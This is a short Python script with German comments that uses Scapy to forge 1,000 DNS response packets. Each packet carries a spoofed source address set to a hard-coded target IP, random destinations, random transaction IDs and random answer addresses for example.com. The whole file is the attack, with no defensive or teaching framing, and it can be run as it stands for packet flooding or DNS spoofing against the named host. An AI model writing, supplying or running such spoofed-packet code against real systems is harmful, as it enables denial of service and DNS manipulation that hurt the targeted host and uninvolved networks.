# -*- coding: utf-8 -*-
import random
from scapy.all import *

# Ziel-IP-Adresse
target_ip = "155.1.102.4"
# DNS-Server-Adresse (kann eine zufällige IP sein)
dns_server_ip = "8.8.8.8"
# Anzahl der Pakete
num_packets = 1000

# Generiere eine zufällige IP-Adresse
def random_ip():
    return ".".join(map(str, (random.randint(0, 255) for _ in range(4))))

# Generiere eine zufällige DNS-Antwort
def random_dns_answer():
    return ".".join(map(str, (random.randint(0, 255) for _ in range(4))))

# Erstelle und sende die Pakete
for _ in range(num_packets):
    # Zufällige Quell-IP
    src_ip = random_ip()
    # Zufällige DNS-Antwort-IP
    answer_ip = random_dns_answer()

    # Erstelle das DNS-Antwortpaket
    dns_response = IP(src=target_ip, dst=src_ip) / UDP(sport=53, dport=random.randint(1024, 65535)) / \
                   DNS(id=random.randint(0, 65535), qr=1, aa=1, qd=DNSQR(qname="example.com"), an=DNSRR(rrname="example.com", ttl=86400, rdata=answer_ip))

    # Sende das Paket
    send(dns_response, verbose=0)

print(f"{num_packets} DNS-Antwortpakete wurden gesendet.")
